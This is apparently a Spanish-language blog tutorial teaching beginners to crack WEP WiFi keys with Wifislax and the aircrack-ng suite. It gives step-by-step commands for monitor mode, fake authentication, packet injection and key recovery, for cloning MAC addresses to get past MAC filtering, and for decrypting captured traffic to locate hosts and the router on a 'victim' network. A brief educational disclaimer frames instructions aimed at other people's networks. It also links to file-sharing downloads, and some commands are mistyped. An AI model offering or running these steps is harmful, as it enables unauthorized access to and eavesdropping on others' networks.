Este Tutorial esta orientado a aquellas personas que tienen un cierto grado de dificultad en la auditoria wireless.....
bahhh! sin mucho rodeo esta hecho para principiantes que solo saben abrir y cerrar el messenger y quieren incursionar en la auditoria wireless.
ADVERTENCIA: ESTE TUTORIAL ESTA HECHO CON FINES COMPLETAMENTE EDUCATIVOS Y PARA PERSONAS QUE DESEEN COMPROBAR CUANTA SEGURIDAD TIENEN EN SUS REDES WIFI.
NO ME RESPONSABILISO POR EL USO INDEBIDO DEL MISMO.
Sin mas nada que decir EL TUTORIAL para hackeo wifi con claves WEP
Materiales:
Wifislax 3.1 descargalo desde la pagina de wifislax
Wifislax versión 3.1 (683MB)
http://download.wifislax.com:8080/wifislax-3.1.iso
Wifislax versión 3.1 - reducida (290MB)
http://download.wifislax.com:8080/wifislax-small-3.1.iso
PC con tarjeta de red inalámbrica compatible
- 10 minutos de tu tiempo y un poco de paciencia
- Conocer la dirección MAC de tu tarjeta
(en caso NO sepas tu direccion mac descarga este programa )
MAC ADRESS CHANGER
lo ejecutan y apuntan la mac que sale por defecto alli
Instrucciones:
Deja que bootee el live cd
-Te va a salir una pantalla que dice presione enter si desea continuar
-luego te saldra otra pantalla y le das enter y continuas...
-esperas un buen rato (depende la compu que tengas, si tienes una intel 386 te moriras sentado esperando, pero si tienes algo mejor contentate :P )
-te va a salir una pantalla en negro que te va a pedir un nombre de usuario y contraseña
Usuario: root
Contraseña: toor
y finalmente tecleas
startx
y presionas enter.
-supuestamente van a cargar algunas cosas y entras al entorno grafico.
-una ves en el entorno grafico abres una consola o shell y tecleas
iwconfig
te deberia reconocer la interface de la tarjeta de red. (PD: fijate cual es tu interface y acuerdate de ella ya que con esa interface haremos casi todo; las interfaces pueden ser ath0 en caso de chipset atheros wlan en caso de realtek, etc)
-ahora anda a wifislax/ herramientas wireless/ Asistente wireless
y apuntas la mac y el channel de la red que quieras hackear tambien el SSID o nombre de red.
-ahora necesitamos estar en modo monitor:
para eso vas a wifislax/ Asisitencia chipset/ chipset
pero si quieres romperte las pelotas y hacerlo por consola tecleas esto:
airmong-ng start
airmong-ng start ath0 6
- Ahora que ya estas en modo monitor tecleas esto:
airodump-ng -w COMETESTA -c6
como ya sabes 6 se remplaza por el canal de la red que vas a hackear.
(El "COMETESTA" es un nombre de archivo elegido por tí, se puede llamar "Peluchin" si tú quieres)
-Despues abres una nueva consola o Shell y tecleas esto para asociarte con el access point o punto de acceso de la red que quieres hackear.
aireplay-ng -1 30 -e XXXX -a MACV -h MACC
"XXXX" ---> se reemplaza por la SSID de la red que vas a hackear
"MACV" ---> Direccion Mac que pretendes Hackear
"MACC" ----> Tu direccion Mac
Quedaría más o menos así:
aireplay-ng -1 30 -e COMETESTA -a 00:00:00:00:00 -h 00:00:00:01 ath0
Con esto tu tarjeta quedará asociada con el punto de acceso víctima
deberia salir authentication successfull y deberas mandar paquetes si esto no sucediera y te de algun error en la autenticacion es porque tiene filtrado mac; para solucionar esto te vas a la consola que abriste casi al principio con el airodump y fijate en la parte de abajo quienes estan asociados ,copia cualquiera de esas mac de preferencia la que este generando mayor trafico o que se le envien mas paquetes.
Ahora para clonar la mac deberas ir a wifislax/ herramientas wireless/ macchanger
pero si quieres hacerlo por consola teclea:
ifconfig ath0 hw ether MACCLONADA
- Ahora abres una nueva consola y tecleas esto para empezar a inyectar paquetes:
aireplay-ng -3 -x600 -b MACV -h MACC
(En este momento ya debes saber donde vas a sustituir y con que)
Quedaría más o menos así:
aireplay-ng -3 -x600 -b 00:00:00:00:00 -h 00:00:00:00:01 ath0
Después de esto los paquetes empezarán a ser enviados.
Después de sobrepasados los 100,000 paquetes enviados se procede a obtener la clave.
Abres una nueva consola y escribes lo siguiente:
aircrack-ptw COMETESTA-01.cap
(Aquí se utiliza el nombre de archivo que especificamos casi al principio al
correr el airodump más el -01 o cualquier otro número -02, -03 etc...)
Apuntar Clave y Disfrutar :P
VEN REDES LIBRES PERO NO SE CONECTAN
filtrado mac:
esto es mucho mejor aun ya que solo necesitaran el wifislax para ver que router o tarjetas de red estan asociadas al access point y luego la clonan en windows con el programa MAC ADRESS CHANGER
para saber que mac estan asociadas salteense todos los pasos y vayanse directo a este:
airodump-ng -w COMETESTA -c6
quedaria masomenos asi:
airodump-ng -w COMETESTA -c6 ath0
SE CONECTARON PERO TIENEN RED LIMITADA O NULA
esto es un problema muy usual , muchas veces los dueños de algunas redes deshabilitan el DHCP eso significa que tienes que configurar manualmente el IP, DNS, ETC...
pero que pasa si el dueño cambio la direccion de su router y no es la que viene por defecto.
1º Captura de datos
Como de costumbre ponemos la tarjeta en modo monitor y abrimos el airodump
Código:
airodump
ejemplo:
Eso sí, tiene que haber alguien conectado, si no creo que va a ser imposible conseguir las Ips. Con unos pocos DATA es suficiente.
ahora van a home en wifislax y veran su archivo.cap
ponen su memoria usb y le dan doble click al archivo.cap
les preguntara donde lo quieren guardar y seleccionan su memoria usb desde storage media.
entran a windows , descarguen wireshark
version 32 bits para windows
http://media-2.cacetech.com/wireshark/win32/wireshark-win32-1.2.6.exe
ahora abrimos nuestra captura con el wireshark ,si este esta encryptado activen la opcion wireless toolbar. y en la barrita que les aparece se coloca la clave wep que hallaron con el aircrack y wireshark les desencriptara el trafico , la otra opcion es usar el airdecap y con este desencriptar el trafico.
Si la red tiene WEP o WPA, primero hay que desencriptar los DATOS, de lo contrario veran todo así:
Para ello usaremos el airdecap:
Si la red tiene WEP:
airdecap -w CLAVEENHEXADECIMALSINPUNTOS archivo.cap
Si tiene WPA:
airdecap -e ESSID(nombre de la red) -p clave
En mi caso, tiene WEP, así que como la clave es 1231231231 hago:
airdecap -w 1231231231 COMETESTA-01.cap
Obtendré el archivo COMETESTA-01-dec.cap, y si los paquetes han sido desencriptados de forma correcta, es decir, la clave es correcta, veremos en Number of Decrypted Paquets un número mayor a 0 que debería ser igual al número de paquetes que tenemos. Yo tenía 30, pues 30.
ahora recien abrimos el .cap con wireshark ; nos mostrara algo asi:
ahora añadimos las columnas que nos faltan
despues te vas la opcion que dice columns y ahi tendras que aumentar la dos columnas faltantes haces clic en NEW y donde dice TITLE le pones un nombre a la columna en mi caso le puse MAC SOURCE en donde dice FORMAT clic en la flechita y veras que te muestra una lista con muchas opciones buscas la que dice HARDWARE SRC ADDR y luego con los botones de UP lo subes hasta donde se ve en la foto luego repites el proceso clic en NEW en TITLE le pones el nombre de MAC DEST en format buscas HARDWARE DEST ADDR y UP la subes hasta donde se ve en la foto
despues clic en APPLY y luego en OK
ahora el wireshark mostrara dos columnas mas las que agragamos se vera así
bueno ya esta casi listo todo .
debemos activar estas opciones mas tal como esta en la foto
ordenar la captura haciendo clic en PROTOCOL de wireshark y tenemos que ver los paquetes HTTP y TCP
ahora veran una lista de ip's, ponganse una de esas y abran el look@Lan
pueden descargarlo desde aqui:
http://www.4shared.com/file/105047629/b696a319/LookLAN.html
La máscara de red no la ponemos, ya nos la pone el Windows automáticamente según la IP que pongamos. En IP, ponemos cualquiera dentro del rango, yo puse 192.168.1.200. Abrimos el Look@lan, (importante,la última versión, ya que es la única que coge los routers) y veremos varias direcciones IP.
Una es la nuestra, y las otras pueden ser del router o de otro ordenador. Entonces abrimos el explorador y vamos probando.
La del router nos responderá pidiendo usuario y clave. Entonces volvemos a lo de las propiedades de la tarjeta y añadimos la puerta de enlace, en mi caso 192.168.1.1
NOTA: NO SIEMPRE EL ROUTER TIENE SU CONFIGURACION VIA WEB ASI QUE A VECES PUEDEN PENSAR QUE NINGUNO DE LOS IP'S FUNCIONA; PERO NO ES ASI SOLO LES QUEDARA IR PRoBANDO DE UNO EN UNO COMO DNS.
luego para probar si hay internet
inicio/ejecutar
ping www.google.es -t
si es que hace ping es porque hay internet.
ERRORES Y SOLUCIONES EN TARJETAS WIRELESS :
tarjeta DWA-210 D-LINK NO RECONOCIDA
rmmod rt61
luego tecleas esto:
modprobe t61
y finalmente esto:
ifconfig wlan0 up (en algunos casos no da con "wlan" entonces lo reemplazan por "ra0" )
inyectar con atheros ar9285 y wifiway 1.0 final
link de descarga wifiway 1.0 final
http://download.wifislax.com:8080/wifiway-1-final.iso
Bueno la cosa esta en utilizar unos drivers que se llaman (compat-wireless-2.6.30.tar.bz2) que los pueden descargar desde la página oficial aquí:
http://linuxwireless.org/en/users/Download/stable/
o desde este link alternativo:
http://depositfiles.com/es/files/unc8lhpcc
Una vez descargados los drivers hacen lo siguiente:
Copiar la carpeta descomprimida (compat-wireless-2.6.30) en el directorio root de WifiWay 1.0 final.
Abrir una consola y poner los siguientes códigos:
cd /root/compat-wireless-2.6.30
make
make install
make unload
make load
este proceso tarda unos 15 minutos pero no se preocupen, todo va bien, cuando se acabe de instalar hacen un reboot y ya les detectara la tarjeta como wlan0, creo que no hace falta explicar que si utilizan el live CD los cambios se pierden, así que lo suyo es instalar WifiWay 1.0 final en una SD o USB de 2 GB como mínimo y utilizar el modo Persistent Changes.
Bueno entonces ya tienen la interface wlan0 ahora la ponemos en modo monitor escribiendo:
airmon-ng start wlan0
les dirá que ha puesto la tarjeta en modo monitor pero en una interface nueva que se llama mon0 que es la que vamos a utilizar para hacer las auditorias, para cambiar la mac de la interface por la mac falsa deben hacerlo así:
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up
Cualquier Duda solo comenten y respondere a la brevedad ;)
No hay comentarios:
Publicar un comentario